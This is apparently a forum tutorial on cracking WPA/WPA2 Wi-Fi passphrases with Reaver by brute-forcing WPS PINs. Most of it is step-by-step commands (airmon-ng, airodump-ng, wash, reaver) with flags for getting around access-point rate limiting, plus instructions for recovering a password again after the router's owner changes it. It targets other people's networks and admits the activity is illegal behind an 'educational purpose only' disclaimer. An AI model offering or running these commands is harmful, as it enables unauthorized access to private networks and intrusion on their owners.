PA2-PSK Cracking

 

Reaver

What is reaver?

Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

How do i use this tool?

As said above, just follow this tutorial :)

NOTE: Reaver doesn't need any Dictionary files!

First, type:

airmon-ng

As said earlier, this shows you, your wireless card name.

I'll use wlan0

We need to set it the wireless card on monitor mode, so type:

airmon-ng start wlan0

After that, type:

airodump-ng mon0 

 

Now, copy the BSSID of the target AP.
Press CONTROL+c to cancel

To see the AP's that are vulnerable to WPS attacks, type:

wash -i mon0

If the target AP is vulnerable, it should say:

WPS Locked: No

 

Now, to start the attack, type:

reaver -i mon0 -b [BSSID] -vv

Now, you'll need to wait around 2-10 hours.

If the AP is limiting you with a message saying:

Quote:[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying

AND

If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type:

reaver --help

This will show you the help menu, you can start playing with the options that you have.

I usually add the: -c -S -L

reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv

This one works great for me, so keep playing with the options untill it works!

When it reaches 100% it should give you some lines, the password is the one after:

WPS PSK: 'PASSWORD HERE'

And here it is!

You should also, remember the PIN.

WPS PIN: PIN HERE

Now, let's say for some reason, the router's owner changed the password for his WiFi.

Since you already have the pin, type:

reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv

And it should give you the password in a matter of seconds!  

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.